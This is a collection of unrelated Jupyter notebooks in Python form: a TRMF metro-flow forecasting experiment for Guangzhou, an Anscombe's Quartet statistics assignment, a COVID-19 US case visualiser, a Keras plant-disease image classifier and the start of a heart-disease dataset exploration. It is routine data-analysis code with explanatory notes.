    dim1, T = dense_mat.shape
    d = time_lags.shape[0]
    start_time = T - pred_step
    results = {step + 1: np.zeros((dim1, pred_time_steps)) for step in range(multi_step)}
    for t in range(pred_time_steps):
        if t == 0:
            # Cold start: random init and a full TRMF fit on the training window.
            init_para = {"W": 0.1 * np.random.randn(dim1, rank),
                         "X": 0.1 * np.random.randn(start_time, rank),
                         "theta": 0.1 * np.random.randn(d, rank)}
            mat, W, X_new, theta = TRMF(dense_mat[:, 0 : start_time], sparse_mat[:, 0 : start_time],
                                        init_para, init_hyper, time_lags, maxiter)
            # Keep only the factors for observed steps (drop forecast rows).
            X_new = X_new[0: (start_time + t), :]
        else:
            # Warm start from the previous factors; cheap partial refit.
            init_para = {"W": W, "X": X_new, "theta": theta}
            mat, W, X_new, theta = TRMF_partial(dense_mat[:, 0 : start_time + t],
                                                sparse_mat[:, 0 : start_time + t],
                                                init_para, init_hyper, time_lags, maxiter2)
            X_new = X_new[0: (start_time + t), :]
        for step in range(multi_step):
            # The last multi_step columns of mat are the forecasts.
            results[step+1][:, t] = mat[:, -multi_step+step]
        if (t + 1) % 36 == 0:
            print('Time step: {}'.format(t + 1))
    return results
# + [markdown] pycharm={"name": "#%% md\n"}
# # Import data
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
data0 = loadmat('..//data//OD_3m.mat')
data0 = data0['OD']
data0 = remove_weekends(data0, start=5)
train_idx = start_end_idx('2017-07-03', '2017-08-11', weekend=False, night=False)
test_idx = start_end_idx('2017-08-14', '2017-08-25', weekend=False, night=False)
num_s = 159
# Subtract the mean in the training set
data = data0.astype(np.float64)
data_mean = data[:, train_idx].reshape([num_s * num_s, 36, -1], order='F')
data_mean = data_mean.mean(axis=2)
for i in range(65):
data[:, i * 36:(i + 1) * 36] = data[:, i * 36:(i + 1) * 36] - data_mean
# + [markdown] pycharm={"name": "#%% md\n"}
# # Parameter tuning
# # Tune weights
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
multi_step = 1
pred_time_steps = 36 * 10 + (multi_step - 1)
train_data = data[:, train_idx]
time_lags = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
d = time_lags.shape[0]
maxiter = 100
# Tune weights
eta = 0.03
rank = 40
rmse_list = []
weights = [500, 1000, 1500, 2000, 2500, 3000]
start = time.time()
reset_random_seeds(1)
for weight in weights:
init_hyper = {"lambda_w": weight, "lambda_x": weight, "lambda_theta": weight, "eta": eta}
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, rank, time_lags, maxiter, maxiter2=10)
rmse_list.append(RMSE(train_data[:, -36 * 10:], results[1]))
print('weight={}, time={}'.format(weight, time.time()-start))
print(rmse_list)
print(rmse_list)
best_weight = weights[np.argmin(rmse_list)]
print('best_weight is {}'.format(best_weight)) # was 3000
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Tune rank
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
init_hyper = {"lambda_w": best_weight, "lambda_x": best_weight, "lambda_theta": best_weight, "eta": eta}
rmse_list = []
ranks = range(30, 100, 10)
reset_random_seeds(1)
for rank in ranks:
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, rank, time_lags, maxiter, maxiter2=10)
rmse_list.append(RMSE(train_data[:, -36 * 10:], results[1]))
print("rank={}, time={}".format(rank, time.time()-start))
print(rmse_list)
print(rmse_list)
best_rank = ranks[np.argmin(rmse_list)]
print("best_rank is {}".format(best_rank)) # was 35
# + [markdown] pycharm={"name": "#%% md\n"}
# # Forcast and save results
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
multi_step = 3
pred_time_steps = 36 * 10 + (multi_step - 1)
train_data = data[:, np.concatenate([train_idx, test_idx])]
time_lags = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
maxiter = 200
init_hyper = {"lambda_w": best_weight, "lambda_x": best_weight, "lambda_theta": best_weight, "eta": eta}
reset_random_seeds(1)
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, best_rank, time_lags, maxiter, maxiter2=10)
mat_hat1 = results[1][:, 2:2 + 360].copy()
mat_hat2 = results[2][:, 1:1 + 360].copy()
mat_hat3 = results[3][:, 0:0 + 360].copy()
for i in range(mat_hat1.shape[1]):
mat_hat1[:, i] += data_mean[:, i % 36]
mat_hat2[:, i] += data_mean[:, i % 36]
mat_hat3[:, i] += data_mean[:, i % 36]
real_OD = data0[:, test_idx]
real_flow = od2flow(real_OD, num_s=num_s)
print('Results of 1-step forecasting:')
predict_flow1 = od2flow(mat_hat1, num_s=num_s)
get_score(real_OD, mat_hat1, real_flow, predict_flow1)
print('Results of 2-step forecasting:')
predict_flow2 = od2flow(mat_hat2, num_s=num_s)
get_score(real_OD, mat_hat2, real_flow, predict_flow2)
print('Results of 3-step forecasting:')
predict_flow3 = od2flow(mat_hat3, num_s=num_s)
get_score(real_OD, mat_hat3, real_flow, predict_flow3)
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step1.npz', data=mat_hat1)
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step2.npz', data=mat_hat2)
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step3.npz', data=mat_hat3)
|
Experiments/Guangzhou_TRMF.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <br>
#
# # Anscombes Quartet - Assignment for Fundamentals of Data Analysis<br>
#
# <br>
# ### Introduction
#
# The Anscombes Quartet is composed of four datasets. Each of the datasets are made up of eleven (x,y) points. These datasets are made up of nearly identical simple descriptive statistics. When the figures are analysed it is expected that if they are plotted they would all have a similar look. However, Anscombe's four datasets, when plotted, look completely different.
# 
# ### Background
#
# Anscombe's Quartet was created by statistician [<NAME>](https://en.wikipedia.org/wiki/Frank_Anscombe) (13 May 1918 – 17 October 2001) in 1973. Anscombe was an English statistician whose interests included statistical computing. He felt it was essential that a computer had the ability to make both calculations and graphs. To emphasise the importance of graphing data he created the four datasets which are now known as [Anscombe's Quartet](https://en.wikipedia.org/wiki/Anscombe%27s_quartet).
#
# Anscombe realized that statistics cannot fully depict any data set. He felt that statistics while great for trends and data, did not present a realistic picture of the data. Statistically data may look the same, but when it is plotted using diagrams and graphs it can look completely different.
#
# In 1973 Anscombe published a paper entitled "Graphs in Statistical Analysis". It was in this paper that he presented the Quartet dataset. He first presented the table of numbers *(see dataset below)*. This dataset contained four distinct datasets. Each dataset had statistical properties which were essentially identical. The mean value of the "x" values is 9.0. The mean value of the "y" values is 7.5. They all have nearly identical variances, correlations, and regression lines. But when they are graphed they are completely different from each other.
#
# The datasest shows that statistics may tell you a lot about data, but they don't tell you everything needed, therefore it is essential that all data is also plotted to get a true picture of the results.
#
# ### Anscombe's Quartet
# Anscombe's Quartet datasets is illustrated below. As can be seen the 'x' values for x1, x2 and x3 are identical. The 'y' values are similar to each other. When they are plotted, as seen in the four graphs below they look completely different.
#
# 
# +
# To plot the four datasets
#Import matplotlib & numpy to plot the 4 datasets
import matplotlib.pyplot as plt
import numpy as np
# Dataset value as x and y
x = np.array([10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5])
y1 = np.array([8.04, 6.95, 7.58, 8.81, 8.33, 9.96, 7.24, 4.26, 10.84, 4.82, 5.68])
y2 = np.array([9.14, 8.14, 8.74, 8.77, 9.26, 8.10, 6.13, 3.10, 9.13, 7.26, 4.74])
y3 = np.array([7.46, 6.77, 12.74, 7.11, 7.81, 8.84, 6.08, 5.39, 8.15, 6.42, 5.73])
x4 = np.array([8, 8, 8, 8, 8, 8, 8, 19, 8, 8, 8])
y4 = np.array([6.58, 5.76, 7.71, 8.84, 8.47, 7.04, 5.25, 12.50, 5.56, 7.91, 6.89])
def fit(x):
    """Shared least-squares regression line of all four Anscombe sets:
    y = 3 + 0.5 * x (works on scalars and NumPy arrays)."""
    return x / 2 + 3
xfit = np.array([np.min(x), np.max(x)])
# Dataset 1 - x1 & y1
plt.subplot(221)
plt.plot(x, y1, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), xticklabels=[], yticks=(4, 8, 12), xticks=(0, 10, 20))
plt.text(3, 12, 'x1 y1', fontsize=14)
# Dataset 2 - x2 & y2
plt.subplot(222)
plt.plot(x, y2, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), xticks=(0, 10, 20), xticklabels=[],
yticks=(4, 8, 12), yticklabels=[], )
plt.text(3, 12, 'x2 y2', fontsize=14)
# Dataset 3 - x3 & y3
plt.subplot(223)
plt.plot(x, y3, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.text(3, 12, 'x3 y3', fontsize=14)
plt.setp(plt.gca(), yticks=(4, 8, 12), xticks=(0, 10, 20))
# Dataset 4 - x4 & y4
plt.subplot(224)
xfit = np.array([np.min(x4), np.max(x4)])
plt.plot(x4, y4, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), yticklabels=[], yticks=(4, 8, 12), xticks=(0, 10, 20))
plt.text(3, 12, 'x4 y4', fontsize=14)
plt.tight_layout()
# -
# ## The Statistics of Anscombe's Quartet
#
# When Anscombe's Quartet Datasets are statistically calculated the results of all four datasets are very similar. This can be seen in the analysis below.
# ### Mean
# The Mean of an array of numbers is also known as the average number. It is calculated by adding all the numbers in the array and dividing by the number of values in the array.
#
# This is the mathematical definition:
# 
#
#
# In Ansombe's datasets the Mean of the 'x' values are 9.0 and the Mean of the 'y' values are 7.5. The **numpy.mean** function has been used to calculate the mean values. The results can be seen below.
#
import numpy as np # to find the mean of the x values of the dataset
ax = (x), (x4)
np.mean(ax)
ay = (y1), (y2), (y3), (y4) # to find the mean of the y values of the dataset
np.mean(ay)
# ### Variance
#
# Variance is used to measure how far an array of numbers are spread. It describes the difference of a random variable from its expected value. It is defined as the average of the squares of the differences between the individual and the expected value.
#
# This is the mathematical definition:
# 
#
# In Ansombe's datasets the Variance of the 'x' values is 10.0 and the Variance of the 'y' values are 3.75. The **numpy.var** function has been used to calculate the variance. The results can be seen below.
ax = (x), (x4) # to find the Variance of the x values of the dataset
np.var(ax)
az = (y1), (y2), (y3), (y4) # to find the Variance of the y values of the dataset
np.var(az)
# ### Standard Deviation
#
# The Standarad Deviation (SD) is used to measure the spread of the values in a distribution. It is calculated as the square root of the variance.
#
# This is the mathematical definition:
# 
#
#
# In Anscombe's datasets, the Standard Deviation of the 'x' values is 3.16 and the Standard Deviation of the 'y' values is 1.93. The **numpy.std** function has been used to calculate the standard deviation. The results can be seen below.
#
np.std(ax) # to find the Standard Deviation of the x values of the dataset
np.std(az) # to find the Standard Deviation of the y values of the dataset
# ### Correlation & the Correlation Coefficient
#
# Correlation is used in statistics to show whether and how strongly pairs of variables are related.
#
# The main result of a correlation is called the correlation coefficient (or "r"). Ranges are from -1.0 to +1.0. The closer r is to +1 or -1, the more closely the two variables are related.
#
# If r is close to 0, it means there is no relationship between the variables.
#
# If r is positive, it means that if one of the variables increases the other variable also increases.
#
# If r is negative it means that is one variable increases the other variable gets smaller. This is also known as the "inverse" correlation.
#
# The below plots illustrate the differences in r:
#
# 
#
#
# Pearson's correlation technique works best with linear relationships, as are found in Anscombe's Quartet. As one variable gets larger the other gets proportionately larger (or smaller).
#
# 
#
# In Anscombe's datasets, the Correlation Coefficient of the (x, y) values is 0.82. The **numpy.corrcoef** function has been used to calculate the correlation coefficient. The results can be seen below.
#
np.corrcoef(x, y1) # The correlation coefficient of dataset (x1 y1)
np.corrcoef(x, y2) # The correlation coefficient of dataset (x2 y2)
np.corrcoef(x, y3) # The correlation coefficient of dataset (x3 y3)
np.corrcoef(x4, y4) # The correlation coefficient of dataset (x4 y4)
# Below is a summary of some of the main statistics relating to Anscombe's Quartet Dataset:
# Verify Mean, Standard Deviation, Coefficient
pairs = (x, y1), (x, y2), (x, y3), (x4, y4)
# NOTE(review): the loop variable x shadows the dataset array x defined
# above; harmless here since x is not reused afterwards, but rename it if
# this cell is extended.
for x, y in pairs:
    print('mean=%1.2f, std=%1.2f, r=%1.2f' % (np.mean(y), np.std(y), np.corrcoef(x, y)[0][1]))
# ## Conclusion
#
# Anscombe's Dataset is interesting because it shows how statistics, while great for describing trends and aspects of data, do not give a full picture of what the data actually is. While the four data sets have several identical statistical properties when they are illustrated using graphs and plotting they are vastly different from one another.
#
# The four data sets have the same mean of x, mean of y, variance in x and variance in y, standard deviation and correlation coefficient as calculated above. If you look at the four graphs which illustrate the datasets above, they are quite different from one another.
#
# The four data sets do have the same linear regression.
# - Graph 1 (x1 y1) is a scatter plot that moves in an approximate linear manner.
# - Graph 2 (x2 y2), above, when plotted is a curvature.
# - Graph 3 (x3 y3) is diagonal except for one point which is far away from all the other points.
# - Graph 4 (x4 y4) is vertical except for one point which is also far away from all the other points.
#
# This shows the while the datasets numerically and statistically look similar when plotted they are nothing alike. This proves that statistics cannot fully depict any dataset. It is important to always plot datasets to ensure accurate results.
# ## References
# https://en.wikipedia.org/wiki/Frank_Anscombe<br>
# https://en.wikipedia.org/wiki/Anscombe%27s_quartet<br>
# https://rstudio-pubs-static.s3.amazonaws.com/52381_36ec82827e4b476fb968d9143aec7c4f.html<br>
# https://medium.com/ibm-data-science-experience/markdown-for-jupyter-notebooks-cheatsheet-386c05aeebed<br>
# https://en.wikipedia.org/wiki/Anscombe%27s_quartet<br>
# https://heapanalytics.com/blog/data-stories/anscombes-quartet-and-why-summary-statistics-dont-tell-the-whole-story<br>
# https://www.youtube.com/watch?v=xlD8FIM5biA<br>
# https://wikivisually.com/wiki/Anscombe%27s_quartet<br>
# https://www.mathwarehouse.com/statistics/what-is-anscombes-quartet.php<br>
# https://matplotlib.org/gallery/specialty_plots/anscombe.html<br>
# http://www3.wabash.edu/econometrics/econometricsbook/Chapters/Ch05InterpretingRegression/ExcelFiles/Anscombe.xls <br>
# https://www.twilio.com/blog/2017/10/basic-statistics-python-numpy-jupyter-notebook.html<br>
# https://www.statsdirect.com/help/basic_descriptive_statistics/standard_deviation.html <br>
# https://www.surveysystem.com/correlation.htm <br>
# https://www.statisticshowto.datasciencecentral.com/probability-and-statistics/correlation-coefficient-formula/<br>
# https://en.wikipedia.org/wiki/Pearson_correlation_coefficient<br>
#
#
|
anscombes.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # COVIDvu - US regions visualizer <img src='resources/American-flag.png' align = 'right'>
# ---
# ## Runtime prerequisites
# +
# %%capture --no-stderr requirementsOutput
# Toggle to True to display the captured `pip install` output in the cell below.
displayRequirementsOutput = False
# %pip install -r requirements.txt
from covidvu.utils import autoReloadCode; autoReloadCode()
# -
# Show the installer output only when explicitly requested above.
if displayRequirementsOutput:
    requirementsOutput.show()
# ---
# ## Pull latest datasets from the JH CSSE GitHub repository
#
# This function is `crontab` ready; it can be called from here, the command line, or as a system job.
# + language="bash"
# ./refreshdata
# -
# ---
# ## Confirmed, deaths, recovered datasets
# +
import os
import pandas as pd
from covidvu.pipeline.vujson import parseCSSE
pd.options.mode.chained_assignment = None
# -
# Parse the JH CSSE "confirmed" dataset ONCE and reuse the result for both
# views; the original called parseCSSE('confirmed') twice, re-reading and
# re-parsing the same files for no benefit.
_confirmedCases = parseCSSE('confirmed')
casesByStateUS = _confirmedCases['casesUSStates']
casesByRegionUS = _confirmedCases['casesUSRegions']
# ---
# ## Cases by US state
# +
from ipywidgets import fixed
from ipywidgets import interact
from ipywidgets import widgets
from covidvu import visualize
# -
# All selectable state names (includes the '!Total US' aggregate column).
statesUS = list(casesByStateUS.columns)
# Multi-select widget for choosing which states to plot.
multiState = widgets.SelectMultiple(
    options=statesUS,
    value=['!Total US'],
    description='State',
    disabled=False
)
# Shared checkbox toggling a logarithmic y-axis on the plots below.
log = widgets.Checkbox(value=False, description='Log scale')
# ### Confirmed cases
# Interactive time-series plot of confirmed cases for the selected states.
interact(visualize.plotTimeSeriesInteractive,
         df=fixed(casesByStateUS),
         selectedColumns=multiState,
         log=log,
         yLabel=fixed('Total confirmed cases'),
         title=fixed('COVID-19 total confirmed cases in US states')
        );
def viewTopStates(n):
    """Show the most-affected US states as a red-shaded table.

    Takes the latest (last) row of ``casesByStateUS``, ranks states by case
    count, and renders rows 1..n-1 — row 0 is skipped because it is the
    '!Total US' aggregate, not a state.
    """
    latest = casesByStateUS.iloc[-1, :]
    ranked = latest.sort_values(ascending=False).iloc[1:n]
    return pd.DataFrame(ranked).style.background_gradient(cmap="Reds")
# Slider-driven table of the top-n states (see viewTopStates above).
interact(viewTopStates, n=widgets.IntSlider(min=1, max=len(statesUS), step=1, value=5));
# ---
# ## Cases by US region
regionsUS = list(casesByRegionUS.columns)
# Multi-select widget for choosing which regions to plot.
multiRegion = widgets.SelectMultiple(
    options=regionsUS,
    value=['!Total US'],
    description='State',
    disabled=False
)
# Interactive time-series plot of confirmed cases for the selected regions.
interact(visualize.plotTimeSeriesInteractive,
         df=fixed(casesByRegionUS),
         selectedColumns=multiRegion,
         log=log,
         yLabel=fixed('Total confirmed cases'),
         title=fixed('COVID-19 total confirmed cases in US regions')
        );
# ---
# © the COVIDvu Contributors. All rights reserved.
|
work/COVIDvu-US.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] _uuid="1020827e241ac87ffdf8e0f8762a6885bdc28fbc"
# Import neccessary packages
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
import numpy as np
import pickle
import cv2
from os import listdir
from sklearn.preprocessing import LabelBinarizer
from keras.models import Sequential
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation, Flatten, Dropout, Dense
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing import image
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# + _uuid="7c3354a78e21a1a62ad0c4689d0ab3238fb760d4"
# Training hyper-parameters and dataset layout.
EPOCHS = 25                              # number of passes over the training set
INIT_LR = 1e-3                           # initial Adam learning rate
BS = 32                                  # mini-batch size
default_image_size = tuple((256, 256))   # every image is resized to this (w, h)
image_size = 0                           # overwritten later with len(image_list)
directory_root = '../input/plantvillage/'  # root of the PlantVillage dataset
width=256
height=256
depth=3                                  # RGB channels
# + [markdown] _uuid="2bf7ac0a0b805946f844a48e55d5281403e53f57"
# Function to convert images to array
# + _uuid="c9c3e60b13ace6c8f3e54336e12f9970fde438a3"
def convert_image_to_array(image_dir):
    """Load the image at *image_dir*, resize it to ``default_image_size``
    and return it as a Keras-style array.

    Returns an empty ``np.array([])`` whenever the file cannot be read or
    processing fails, so the caller's ``image_list`` stays homogeneous.
    """
    try:
        image = cv2.imread(image_dir)
        if image is not None :
            image = cv2.resize(image, default_image_size)
            return img_to_array(image)
        else :
            # cv2.imread returns None for missing/unreadable files.
            return np.array([])
    except Exception as e:
        print(f"Error : {e}")
        # Fixed: the original returned None here, which is inconsistent with
        # the empty-array branch above and would make
        # np.array(image_list, ...) fail later in the pipeline.
        return np.array([])
# + [markdown] _uuid="24d42b87fad54a9556f78357ce673cc5152468c1"
# Fetch images from directory
# + _uuid="bb8d4c343314028f52ae3c3a840478a834a16c95"
image_list, label_list = [], []
try:
    print("[INFO] Loading images ...")
    # Filter out macOS ".DS_Store" metadata entries with comprehensions.
    # The original called list.remove() while iterating the same list,
    # which silently skips the element after each removal.
    root_dir = [d for d in listdir(directory_root) if d != ".DS_Store"]
    for plant_folder in root_dir :
        plant_disease_folder_list = [d for d in listdir(f"{directory_root}/{plant_folder}")
                                     if d != ".DS_Store"]
        for plant_disease_folder in plant_disease_folder_list:
            print(f"[INFO] Processing {plant_disease_folder} ...")
            plant_disease_image_list = [f for f in listdir(f"{directory_root}/{plant_folder}/{plant_disease_folder}/")
                                        if f != ".DS_Store"]
            # Cap at 200 images per class to keep memory bounded.
            for image in plant_disease_image_list[:200]:
                image_directory = f"{directory_root}/{plant_folder}/{plant_disease_folder}/{image}"
                if image_directory.endswith(".jpg") or image_directory.endswith(".JPG"):
                    image_list.append(convert_image_to_array(image_directory))
                    label_list.append(plant_disease_folder)
    print("[INFO] Image loading completed")
except Exception as e:
    print(f"Error : {e}")
# + [markdown] _uuid="35c4b76d33e0263523e479657580104532f81d6e"
# Get Size of Processed Image
# + _uuid="6ee1ad9c422f112ec2862699b5c0f68b8d658123"
# Number of images actually loaded.
image_size = len(image_list)
# + [markdown] _uuid="905b41b226f3fd82a88e67821eb42a07f24b31f7"
# Transform Image Labels uisng [Scikit Learn](http://scikit-learn.org/)'s LabelBinarizer
# + _uuid="904ff893fe14f5060dd9e7be2ccf96ec793597e5"
# One-hot encode the string class labels; persist the fitted binarizer so
# predictions can be mapped back to class names later.
label_binarizer = LabelBinarizer()
image_labels = label_binarizer.fit_transform(label_list)
pickle.dump(label_binarizer,open('label_transform.pkl', 'wb'))
n_classes = len(label_binarizer.classes_)
# + [markdown] _uuid="f860c29a1d714f06d25e6a0c5bca94739e5d24cc"
# Print the classes
# + _uuid="0f876397c40c3c8aa09772a92fd60481fc9ba268"
print(label_binarizer.classes_)
# + _uuid="6cd9c977b3d164a5570a0c24fdd8624adb9d56b8"
# Normalize 8-bit pixel values into [0, 1]. Fixed: the original divided by
# 225.0, a typo for 255.0 (the maximum 8-bit intensity), which left values
# slightly above 1.
np_image_list = np.array(image_list, dtype=np.float16) / 255.0
# + _uuid="9f4829560fdfa218cee18c1cfb2eb9452ef180e5"
print("[INFO] Spliting data to train, test")
# 80/20 train/test split; fixed seed for reproducibility.
x_train, x_test, y_train, y_test = train_test_split(np_image_list, image_labels, test_size=0.2, random_state = 42)
# + _uuid="eec8afa64e676d52c814fc8e096955a60f13b6c5"
# On-the-fly data augmentation applied to training batches only.
aug = ImageDataGenerator(
    rotation_range=25, width_shift_range=0.1,
    height_shift_range=0.1, shear_range=0.2,
    zoom_range=0.2,horizontal_flip=True,
    fill_mode="nearest")
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
# Small CNN: two conv/pool stages followed by a dense classifier head.
model = Sequential()
inputShape = (height, width, depth)
chanDim = -1
# Support channels-first backends (e.g. Theano-style layouts).
if K.image_data_format() == "channels_first":
    inputShape = (depth, height, width)
    chanDim = 1
model.add(Conv2D(32, (3, 3), padding="same",input_shape=inputShape))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
# Final softmax over the n_classes one-hot labels.
model.add(Dense(n_classes))
model.add(Activation("softmax"))
# + [markdown] _uuid="53b13c03e4cea6dc2453a84e254b806ebeed2d99"
# Model Summary
# + _uuid="1e1523a834fbf872940171fbdefb3dcce2b5f31b"
model.summary()
# + _uuid="b21dffee32c325136b4ea23ac511049723f34a24"
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
# distribution
# Fixed: the network ends in a softmax over n_classes mutually exclusive
# one-hot labels (LabelBinarizer output), so categorical_crossentropy is the
# matching loss. binary_crossentropy scores each output independently and
# inflates the reported accuracy on multi-class problems.
model.compile(loss="categorical_crossentropy", optimizer=opt,metrics=["accuracy"])
# train the network
print("[INFO] training network...")
# + _uuid="1a13efc5ded339fc3c0d9e61041e8ca555362db0"
# Train on augmented batches; validate on the untouched test split.
history = model.fit_generator(
    aug.flow(x_train, y_train, batch_size=BS),
    validation_data=(x_test, y_test),
    steps_per_epoch=len(x_train) // BS,
    epochs=EPOCHS, verbose=1
    )
# + [markdown] _uuid="1495fea08b37e4d4293f975ba30e6c1fc7a85ed9"
# Plot the train and val curve
# + _uuid="0af5e0f23657a4effc2d21cf8e840e81f42ec8e7"
# NOTE(review): the 'acc'/'val_acc' keys are the old standalone-Keras names
# (consistent with the keras.layers.normalization import above); under
# tf.keras these keys are 'accuracy'/'val_accuracy' — confirm if migrating.
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
#Train and validation accuracy
plt.plot(epochs, acc, 'b', label='Training accurarcy')
plt.plot(epochs, val_acc, 'r', label='Validation accurarcy')
plt.title('Training and Validation accurarcy')
plt.legend()
plt.figure()
#Train and validation loss
plt.plot(epochs, loss, 'b', label='Training loss')
plt.plot(epochs, val_loss, 'r', label='Validation loss')
plt.title('Training and Validation loss')
plt.legend()
plt.show()
# + [markdown] _uuid="9ca1a4489bd624c69a13cd37c0c2306ac8de55c2"
# Model Accuracy
# + _uuid="bb44f3d0b7e2862bc7d1a032612ebfd48212c1fe"
print("[INFO] Calculating model accuracy")
# evaluate() returns [loss, accuracy]; index 1 is the accuracy metric.
scores = model.evaluate(x_test, y_test)
print(f"Test Accuracy: {scores[1]*100}")
# + [markdown] _uuid="2a1f759db8afe933e62fe4cf8332cb303bb11be8"
# Save model using Pickle
# + _uuid="5cdf06adf492d79ed28fbdc36e02ad7489c7b33e"
# save the model to disk
print("[INFO] Saving model...")
pickle.dump(model,open('cnn_model.pkl', 'wb'))
# -
|
DiseasePredictior/plant-disease-detection-using-keras (1).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt # this is used for the plot the graph
import seaborn as sns # used for plot interactive graph.
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import average_precision_score
from sklearn.model_selection import cross_val_score
from sklearn.metrics import precision_recall_curve
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import roc_curve
from sklearn.metrics import f1_score
from sklearn.metrics import auc
from sklearn.svm import SVC
# %matplotlib inline
from IPython.core.interactiveshell import InteractiveShell
# Echo every expression in a cell, not just the last one.
InteractiveShell.ast_node_interactivity = "all"
# ## Cause of Heart Disease
# 1. Excess weight, especially around the stomach area, increases a woman's risk of developing cardiovascular disease and lack of physical activity makes it worse.
# 2. Diabetes causes damage to blood vessels so diabetes is a major factor in developing cardiovascular disease.
# 3. Unhealthy foods, lack of exercise, lead to heart disease. So can high blood pressure, infections, and birth defects.
# 4. Smoking is one of the biggest causes of cardiovascular disease.
# 5. Just a few cigarettes a day can damage the blood vessels and reduce the amount of oxygen available in our blood.
# * But other things might surprise you.
# #### Loading the Data
# Load the UCI heart-disease dataset (one row per patient).
df=pd.read_csv('heart.csv')
df.head(5)
# It's a clean, easy to understand set of data. However, the meaning of some of the column headers are not obvious. Here's what they mean,
#
# 1.age: The person's age in years
#
# 2.sex: The person's sex (1 = male, 0 = female)
#
# 3.cp: The chest pain experienced (Value 1: typical angina, Value 2: atypical angina, Value 3: non-anginal pain, Value 4: asymptomatic)
#
# 4.trestbps: The person's resting blood pressure (mm Hg on admission to the hospital)
#
# 5.chol: The person's cholesterol measurement in mg/dl
#
# 6.fbs: The person's fasting blood sugar (> 120 mg/dl, 1 = true; 0 = false)
#
# 7.restecg: Resting electrocardiographic measurement (0 = normal, 1 = having ST-T wave abnormality, 2 = showing probable or definite left ventricular hypertrophy by Estes' criteria)
#
# 8.thalach: The person's maximum heart rate achieved
#
# 9.exang: Exercise induced angina (1 = yes; 0 = no)
#
# 10.oldpeak: ST depression induced by exercise relative to rest ('ST' relates to positions on the ECG plot. See more here)
#
# 11.slope: the slope of the peak exercise ST segment (Value 1: upsloping, Value 2: flat, Value 3: downsloping)
#
# 12.ca: The number of major vessels (0-3)
#
# 13.thal: A blood disorder called thalassemia (3 = normal; 6 = fixed defect; 7 = reversable defect)
#
# 14.target: Heart disease (0 = no, 1 = yes)
#
df.describe()
# `describe()` summarizes the numeric columns: count, mean, std, min, max and the 25%/50%/75% quartiles.
# As seen here, most columns hold small categorical codes; the truly continuous columns that need attention are: age, trestbps, chol, thalach.
df.shape
# Looking at information of heart disease risk factors led me to the following: high cholesterol, high blood pressure, diabetes, weight, family history and smoking 3. According to another source 4, the major factors that can't be changed are: increasing age, male gender and heredity. Note that thalassemia, one of the variables in this dataset, is hereditary. Major factors that can be modified are: smoking, high cholesterol, high blood pressure, physical inactivity, and being overweight and having diabetes. Other factors include stress, alcohol and poor diet/nutrition.
# Now I will check every column for nulls and sum them, which shows how many values are missing in the data.
#
df.isnull().sum()
# There are no missing data in this dataset.
plt.figure(figsize=(10,10))
sns.heatmap(df.corr(),annot=True,fmt='.1f')
plt.show()
